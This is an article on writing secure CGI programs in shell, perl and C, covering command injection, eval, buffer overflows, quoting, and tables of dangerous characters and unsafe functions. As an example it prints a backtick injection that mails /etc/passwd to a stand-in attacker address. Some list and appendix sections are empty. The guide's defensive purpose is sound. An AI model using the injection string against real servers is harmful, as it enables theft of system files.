originally Feb 2002
revised through 2008

Writing Safe CGI Programs

CGI software has the potential to create some enormous security holes on your system. If it is carelessly programmed, it can allow evildoers out there on the Internet to enter Unix commands into a form and have them executed on your web server. This article covers the basics of making your CGI software secure. It is written for Unix-based environments. The languages discussed are shell, perl, and C, but the principles should apply to any language.

[Because many of the examples need every kind of quote character, literal strings are not surrounded by quotes. Each example string is exactly the text shown, with no surrounding quotes.]

Contents:
  Shell Game
  Other Problems
  Summary
  Appendix A: Dangerous Characters
  Appendix B: Unsafe Operations
  Appendix C: Unsafe Library Functions

Shell Game

We'll start with a few examples of how you can get into trouble. This bit of perl code is intended to search for files in a specific directory and find any that match a user-provided search specification:
  # UNSAFE: $searchspec comes straight from the form
  open(my $fh, "/bin/ls /data/cardfiles | grep $searchspec |") or die "can't run ls: $!";
The variable $searchspec contains information that was extracted directly from the HTML form. Let's suppose the user enters zippy. Perl runs the command /bin/ls /data/cardfiles | grep zippy the same way the C function popen() would: it hands the whole string to /bin/sh, which actually starts up the command. The shell is used because it gives the programmer much greater freedom in what commands can be run and how they are started. For example, you can use a pipe to run two commands, as in the example above; without the shell, you'd have to start the commands separately and read from one and write to the other yourself. Access to the full syntax of the shell is handy for many other reasons too, but this is also where the trouble begins.

Suppose the user enters this into the searchspec field of the form:

  blah `/bin/mailx -s anothervictim evilperson@evildomain.org < /etc/passwd`

The shell is then handed this command:
  /bin/ls /data/cardfiles | grep blah `/bin/mailx -s anothervictim evilperson@evildomain.org < /etc/passwd`
The backticks and the file redirection work just like they would in any shell command, and so the contents of the password file are mailed to evilperson. A semicolon or a newline in the input works much the same way: either one ends the grep command, and whatever follows it runs as a separate command of the attacker's choosing.

Most security problems in CGIs can be traced to a shell being unexpectedly started and handed some data from the HTML form. And in almost every case, the shell is started simply as a convenient way to start some other outside program. (Our examples focus on just one way this can happen; a list of possible trouble spots is found in Appendix B.) This brings us to one of the most important recommendations here:

Avoid starting external programs where possible. It is always best if you can build all of the needed functionality into your CGI. Even if you start the external program in a secure way, it's possible that the external program could manage to do something insecure that you didn't expect.

But sometimes you have to start external programs. Can it be done securely? The best way is to make sure the user data is clean of any trouble. In fact, the best way to make any CGI secure is to completely isolate the input data from any possible abuse. Suppose a field on the form has just three possible values, Yes, No, and Maybe. You could simply compare the input value to each of these three values, and if it doesn't match, immediately generate an error and give up. If there is an exact match, then you know the value is completely safe to use.
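Here is a minimal C sketch of that exact-match check. The function name check_answer and its table of values are illustrative only, and it assumes the field's value has already been extracted and decoded from the query string by some other part of the program.

```c
#include <string.h>

/* The only values this form field is supposed to send. */
static const char *const allowed_answers[] = { "Yes", "No", "Maybe" };

/*
 * Return our own copy of the value if input exactly matches one of the
 * allowed values, or NULL if it does not (the caller should then report
 * an error and give up).  Returning the table's string rather than the
 * user's buffer means later code only ever handles strings we wrote.
 */
const char *check_answer(const char *input)
{
    size_t i;

    if (input == NULL)
        return NULL;
    for (i = 0; i < sizeof allowed_answers / sizeof allowed_answers[0]; i++) {
        const char *ok = allowed_answers[i];
        /* Comparing strlen(ok) + 1 bytes includes the terminating NUL,
         * so only an exact match succeeds, never a prefix match. */
        if (strncmp(input, ok, strlen(ok) + 1) == 0)
            return ok;
    }
    return NULL;
}
```

Because the comparison includes the terminating NUL, Yes matches but Yes; rm -rf / does not, and strncmp() never reads further into the input than the length of the allowed value plus one.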

As an aside, you can't rely on the HTML form to provide this constraint. If you have a pulldown menu that contains a list of values, it is still possible for a malicious user to submit other values you don't list. They can simply copy your HTML form and edit the values; this works for both the GET and POST methods. Also note that a malicious user can encode values directly in the URL for use with the GET method, and because of how most CGI libraries work, this will probably work even if the author originally used POST.

Unfortunately it is not always possible to constrain your input so tightly. For instance, in a search form you usually can't predict every reasonable search term in advance. If you can't constrain the input, and you have to start an outside program, your best bet is to avoid using the shell to start it. If the current program is finished once the outside program starts, you can just use exec(), which replaces the current program with the new one. This command exists (in one form or another) in shell, perl, and C (note that care must be used in perl; see Appendix B). In all three languages, you'll be protected from immediate harm (but you still have to worry about what the new program does with the data). But if you are opening a pipe to a command (as in the first example), then coding this is a bit trickier. You need to understand pipe(), fork(), and exec(), and a complete description is beyond the scope of this article. Perl will do a fork() and exec() for you with the system() function (note that this doesn't set up piped I/O); however, care must be taken to use the correct form, otherwise a shell may still be used. For more on this, see the line item for the system() function in the perl section of Appendix B.
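A rough C sketch of the pipe(), fork(), and exec() sequence follows, assuming a POSIX system. It stands in for popen() but never involves /bin/sh: the program receives each element of the argument vector as exactly one argument. The function name run_without_shell is hypothetical, and the sketch only captures standard output, with minimal error handling.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Run argv[0] (looked up in PATH by execvp) and read up to outsize-1 bytes
 * of its standard output into out.  Returns the program's exit status
 * (127 if it could not be started), or -1 on error.
 */
int run_without_shell(char *const argv[], char *out, size_t outsize)
{
    int fds[2];
    int status;
    pid_t pid;
    size_t used = 0;
    ssize_t n;

    if (outsize == 0 || pipe(fds) == -1)
        return -1;

    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: send standard output into the pipe, then replace ourselves
         * with the requested program.  No shell ever sees argv. */
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) == -1)
            _exit(127);
        if (fds[1] != STDOUT_FILENO)
            close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                     /* reached only if exec failed */
    }

    /* Parent: read the child's output without running past the buffer. */
    close(fds[1]);
    while (used < outsize - 1 &&
           (n = read(fds[0], out + used, outsize - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    /* Closing the read end discards any output that didn't fit; a child
     * still writing will then get SIGPIPE and we report -1 below. */
    close(fds[0]);

    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For instance, an argument vector such as { "grep", "--", searchspec, "somefile", NULL } (somefile is a placeholder) hands the user's text to grep literally, backticks and all. The -- tells grep that no more options follow, since the program you start can still misread its arguments, for example treating a search term that begins with - as an option. A CGI program may also prefer an absolute path in argv[0] over a PATH lookup.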

If you aren't a system programmer, or if you have particularly complex file redirection needs, then it may be difficult to avoid the temptation to let the shell start your external program. Even if you do use exec, if you don't control the sources to the outside program, you still aren't protected. So what else can we do to stay safe?

An adequate (but not great) solution is to attempt to strip out all of the dangerous characters. The problem with this is that the list is long, and you might miss something. Worse, which characters are dangerous depends on exactly what you are doing, and which language(s) you are working with. Consider this example:

  open(my $fh, "grep $name /data/phonebook |") or die "can't run grep: $!";
In this example, even a space becomes a dangerous character. If the evildoer enters root /etc/passwd, the command that is run will be grep root /etc/passwd /data/phonebook, and (depending on how the output is handled) the CGI output may well include root's entry from the password file.
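Stripping is much more reliable when it is done as a whitelist: keep the characters you know are harmless rather than removing the ones you believe are dangerous. Here is a minimal C sketch, assuming the field only ever needs ASCII letters and digits (the function name keep_alnum is hypothetical).

```c
#include <string.h>   /* size_t */

/*
 * Copy src into dst, keeping only ASCII letters and digits.  At most
 * dstsize-1 characters are kept and dst is always NUL-terminated.
 * Returns 1 if anything was dropped (unsafe, or no room left), 0 if the
 * input was copied unchanged, and -1 if dstsize is 0.
 */
int keep_alnum(const char *src, char *dst, size_t dstsize)
{
    size_t out = 0;
    int changed = 0;

    if (dstsize == 0)
        return -1;
    for (; *src != '\0'; src++) {
        unsigned char c = (unsigned char)*src;
        /* Test ASCII ranges directly; isalnum() can accept more in some locales. */
        int safe = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                   (c >= '0' && c <= '9');

        if (!safe || out == dstsize - 1) {
            changed = 1;
            continue;
        }
        dst[out++] = (char)c;
    }
    dst[out] = '\0';
    return changed;
}
```

With this filter, the attack above collapses to the harmless search term rootetcpasswd. If silently changing the user's input seems wrong for your form, use the return value to reject the request instead.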

If you can identify every dangerous character and strip them out, that's great. In some cases, you can even simply limit the input to alphanumerics, which will provide good protection. But suppose the input is supposed to include some of these dangerous characters? If you can't filter them out, the next best thing is to quote the characters so that they won't be dangerous anymore:

  open(my $fh, "grep '$name' /data/phonebook |") or die "can't run grep: $!";
Now we're protected against the dangerous spaces, as well as every other dangerous character, except for the single quote! If the user enters anything containing a single quote, it ends our quoting early, and we're back to where we started. We can replace each single quote with the string '"'"' (the first single quote ends the current quoted text, then a pair of double quotes is used to quote a single quote, and then the final single quote restarts normal single-quoting). This makes the string completely safe, at least from the shells. It also assumes that the program we call doesn't pass the string to a shell again: by the time the command receives it, the shell has already stripped out our quoting, and we're back to a raw string. If you know the string will go through two or more shell evaluations, quoting becomes almost hopelessly complex.
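Here is a minimal C sketch of that quoting rule, for a string that will be pasted into a command line that /bin/sh interprets exactly once. The function name sh_single_quote is hypothetical, and the caller must free() the result.

```c
#include <stdlib.h>
#include <string.h>

/*
 * Return a newly malloc()ed copy of s wrapped in single quotes, with each
 * embedded single quote replaced by '"'"'.  The result survives ONE pass
 * through /bin/sh; a second shell evaluation needs quoting again.
 * Returns NULL if memory runs out.
 */
char *sh_single_quote(const char *s)
{
    size_t len = 2;                     /* opening and closing quote */
    const char *p;
    char *result, *out;

    for (p = s; *p != '\0'; p++)
        len += (*p == '\'') ? 5 : 1;    /* ' becomes the 5 characters '"'"' */

    result = malloc(len + 1);           /* +1 for the terminating NUL */
    if (result == NULL)
        return NULL;

    out = result;
    *out++ = '\'';
    for (p = s; *p != '\0'; p++) {
        if (*p == '\'') {
            memcpy(out, "'\"'\"'", 5);  /* end quote, "'", restart quote */
            out += 5;
        } else {
            *out++ = *p;
        }
    }
    *out++ = '\'';
    *out = '\0';
    return result;
}
```

For example, the input it's comes back as 'it'"'"'s', which the shell reassembles into the original four characters.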

A simpler way to handle quoting is to put a backslash in front of each problem character. It's a more consistent approach (there's no bizarre exception like quoting the single quote above). You just have to remember to backslash everything that might be a problem (see Appendix A). In many cases, you can even put a backslash in front of every character (including normal characters) and get the protection you want without causing any problems. Again, though, if the string goes through additional evaluations, you have to add quoting for each evaluation, and this becomes very complex: for n evaluations, 2^n - 1 backslashes are needed in front of each character.
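The backslash approach is easy to sketch in C. This version (the function name sh_backslash is hypothetical) takes the conservative route and backslashes every character that isn't an ASCII letter or digit, rather than relying on a list of dangerous characters being complete.

```c
#include <stdlib.h>
#include <string.h>

/*
 * Return a newly malloc()ed copy of s with a backslash in front of every
 * character that is not an ASCII letter or digit.  In sh, a backslash
 * before an ordinary character simply yields that character, so the extra
 * escapes are harmless.  Caveat: sh treats backslash-newline as a line
 * continuation, so escaped newlines are removed rather than preserved.
 * Returns NULL if memory runs out.
 */
char *sh_backslash(const char *s)
{
    char *result = malloc(2 * strlen(s) + 1);  /* worst case: all escaped */
    char *out = result;

    if (result == NULL)
        return NULL;
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        int plain = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                    (c >= '0' && c <= '9');
        if (!plain)
            *out++ = '\\';
        *out++ = (char)c;
    }
    *out = '\0';
    return result;
}
```

Running the output through the function again shows how quickly multiple evaluations pile up: one pass turns ; into \;, a second gives \\\; (three backslashes), and a third gives seven, which is 2^n - 1 backslashes for n passes.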

Note that with perl, if there are no shell special characters in an open command, then it won't use the shell to interpret the command. Unfortunately, backslashes are not counted as special characters, so if you protect through backslashing, the backslashes may or may not be stripped, depending on how perl chooses to execute the command. And you can't rely on perl not using the shell, because if user input contains special characters, then it may behave differently than it does in your tests.

Other Problems

That about covers all the different approaches to making yourself safe from shells. But this is only one way in which you can get into trouble.

Any interpreted language can expose the input string to unexpected evaluations. Normally, in interpreted languages, simply having the information stored in a variable offers some protection from problems. For instance, in perl, $total = $input*1.15 + 37.50; cannot be subverted by putting dangerous characters into the $input variable, because by the time perl replaces the variable with its value, it has already finished checking for backticks and things like that. This is also true if /bin/sh is your scripting language. However, both of these languages have an eval statement, which causes a second pass of evaluation to occur. Here's an example of how this can be handy. Part of the user input involves selecting a sorting function, which is stored in the variable $howsort:

  @newlist = eval "sort $howsort \@oldlist";
Without the eval, you'd have to use an if/else to check each possible value of $howsort, so it is handy. And it doesn't invoke the shell as it stands. However, it re-invokes the perl interpreter on the string, so if $howsort includes a string with backticks, the user can make it run the shell. Even ignoring backticks, an attacker could insert any perl code at all here, and it would be run; this could include a large block of code. The best solution is to test each possible value within an if/else or case statement. Again, you could try filtering or quoting, but you should really avoid eval statements if at all possible. And it usually is possible; it just makes the code longer and more complicated.
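C has no string eval, but the table-driven alternative carries over directly and is often shorter than a long if/else chain. In this sketch, the sort names ascending and descending, the integer list, and the function sort_by_name are all illustrative assumptions. The user's value only selects one of a fixed set of comparison functions, so it can never become code.

```c
#include <stdlib.h>
#include <string.h>

/* Comparators for the orderings the form is allowed to request. */
static int ascending(const void *a, const void *b)
{
    int x = *(const int *)a, y = *(const int *)b;
    return (x > y) - (x < y);
}

static int descending(const void *a, const void *b)
{
    return ascending(b, a);
}

/* Map from the value the form sends to the code we will run for it. */
static const struct {
    const char *name;
    int (*compare)(const void *, const void *);
} sort_table[] = {
    { "ascending",  ascending  },
    { "descending", descending },
};

/*
 * Sort list in place using the ordering named by howsort.  An unknown
 * name is rejected (return -1) rather than interpreted in any way.
 */
int sort_by_name(const char *howsort, int *list, size_t n)
{
    size_t i;

    if (howsort == NULL)
        return -1;
    for (i = 0; i < sizeof sort_table / sizeof sort_table[0]; i++) {
        const char *name = sort_table[i].name;
        if (strncmp(howsort, name, strlen(name) + 1) == 0) {
            qsort(list, n, sizeof list[0], sort_table[i].compare);
            return 0;
        }
    }
    return -1;
}
```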

Compiled languages that use the C library functions suffer from a problem of their own. Because many of the library functions don't do bounds checking on input strings, it is possible to overflow a buffer while reading input, overwrite the stack, and cause the program to execute machine code that was supplied by the user. So a user can send arbitrarily long query strings to your program, hoping to overflow a buffer and run something of their own. Contrary to popular belief, access to the source code is not required; the evildoer just has to keep trying inputs of different lengths.

This problem can be avoided by taking care not to let buffers overflow. If you are using read() in a loop, just add an exit condition for hitting the end of the buffer. For the library functions, there are safe forms of most functions. Even where there aren't, you only have to check that a string is short enough before using it in an unsafe function. Appendix C lists some unsafe functions and their safe equivalents.
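Here is a minimal C sketch of a bounded read of a POST body, assuming the length arrives in the CONTENT_LENGTH environment variable (which the web server sets from the request's Content-Length header). The function name read_body is hypothetical. The important part is that the client-supplied length is checked against the buffer size before anything is read.

```c
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Read a body of content_length bytes from fd into buf (bufsize bytes),
 * keeping one byte for the terminating NUL.  Returns the number of bytes
 * read, or -1 if the length is invalid or too large for the buffer, a
 * read fails, or the body is shorter than promised.
 */
long read_body(int fd, char *buf, size_t bufsize, const char *content_length)
{
    char *end;
    long want, got = 0;
    ssize_t n;

    if (content_length == NULL || bufsize == 0)
        return -1;
    errno = 0;
    want = strtol(content_length, &end, 10);
    if (errno != 0 || end == content_length || *end != '\0' || want < 0 ||
        (size_t)want > bufsize - 1)
        return -1;                      /* not a number, or won't fit: refuse */

    while (got < want) {                /* read() may return less than asked */
        n = read(fd, buf + got, (size_t)(want - got));
        if (n == -1 && errno == EINTR)
            continue;
        if (n <= 0)
            return -1;
        got += n;
    }
    buf[got] = '\0';
    return got;
}
```

A CGI program would call it as read_body(STDIN_FILENO, buf, sizeof buf, getenv("CONTENT_LENGTH")) and refuse the request if it returns -1.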

Even if you avoid all of the above general-case pitfalls, there's still room for evil to occur. There are a great number of application-specific holes that you could leave if you aren't careful. Here are some examples:

Summary

Here are all of the above recommendations, in the order that I would prioritize them.
  1. When you can, check that the provided values exactly match expected values.
  2. Avoid eval at all costs.
  3. Avoid calling outside programs.
  4. If you call outside programs, avoid using the shell to start them. Appendix B lists some operations that may start a shell, but realize that it is not a complete list.
  5. If you have to use eval, or a shell, and if you can't completely check the input, then consider stripping out dangerous characters, or quoting them, where appropriate.
  6. Even if you aren't using eval, and you are avoiding shell interpretation, think carefully about other ways in which the user data is being used, and how that might be exploited.

Appendix A: Possibly Dangerous Characters

The following characters may cause problems when /bin/sh or /bin/csh (or variants of those programs) are used to start outside programs, or within eval statements if these shells are used to implement CGI programs. You should not assume this list is complete.

Character Name       Character   Problems
backslash            \           quoting
double quote         "           quoting
single quote         '           quoting
dollar sign          $           variable substitution
ampersand            &           command separator
greater than         >           I/O redirection
less than            <           I/O redirection
asterisk             *           file globbing
question mark        ?           file globbing
left bracket         [           file globbing
right bracket        ]           file globbing
left paren           (           word separator
right paren          )           word separator
pipe                 |           command separator
backtick             `           subcommand execution
semicolon            ;           command separator
pound sign           #           comment character (sh only)
caret                ^           command separator (sh only)
exclamation point    !           history execution (csh only)
tilde                ~           username expansion (csh only)
carriage return      ascii 13    command separator
line feed            ascii 10    command separator
space                ascii 32    word separator
tab                  ascii 9     word separator
NULL                 ascii 0     truncates input

Appendix B: Possibly Unsafe Operations

The following problems should NOT be considered an exhaustive list.

C

perl

shell

PHP - these notes are preliminary; I don't yet know how safe or unsafe PHP is, but these should be used carefully:

Appendix C: Unsafe Library Functions

The following C library functions (on the left) can suffer from buffer overflow problems. The functions on the right are preferred to prevent these problems. They may not always be completely equivalent, so please check the man pages for details. If the safe replacement isn't available on your system, make sure to check the lengths of strings before using them.

Simply using these functions doesn't make you safe: you have to make sure the size limits you use match the sizes of your buffers (usually minus one, to leave room for the terminating NUL). For example, it is tempting to use read() or fread() (not listed here because they're generally safe) with the size set to the value from the Content-Length HTTP field, but because the client controls that value, this can lead to a buffer overrun.

Unsafe Function               Safe Replacement
gets()                        fgets()
sprintf()                     snprintf() [if available]
strcat()                      strncat() or strlcat()
strcpy()                      strncpy() or strlcpy()
strcmp()                      strncmp()
strcasecmp()                  strncasecmp()
scanf(), fscanf(), sscanf()   if %s is used, make sure to specify input length (e.g. %12s)
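Here is a short C sketch of a few of these replacements in use, showing the checks they don't do for you: detecting truncation, and terminating a strncpy() result by hand. The function names are hypothetical. strlcpy() and strlcat() are left out because not every C library provides them.

```c
#include <stdio.h>
#include <string.h>

/* Read one line with fgets() instead of gets(): at most size-1 characters
 * are stored.  Returns 0 for a complete line (newline removed), 1 if no
 * newline was read (line cut short, or last line lacks one), -1 at EOF. */
int read_line(FILE *fp, char *buf, int size)
{
    size_t len;

    if (fgets(buf, size, fp) == NULL)
        return -1;
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    return 1;                /* the rest of a long line is still in fp */
}

/* snprintf() never writes more than dstsize bytes and NUL-terminates when
 * dstsize > 0; its return value is the length the full result WOULD have
 * had, so a value >= dstsize means truncation.  Returns -1 if truncated. */
int copy_checked(char *dst, size_t dstsize, const char *src)
{
    int n = snprintf(dst, dstsize, "%s", src);
    return (n < 0 || (size_t)n >= dstsize) ? -1 : 0;
}

/* strncpy() does NOT terminate dst when src is too long, so the last byte
 * is set by hand.  Returns -1 if src was truncated. */
int copy_strncpy(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    strncpy(dst, src, dstsize - 1);
    dst[dstsize - 1] = '\0';
    return strlen(src) >= dstsize ? -1 : 0;
}
```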


Tom Fine's Home Send Me Email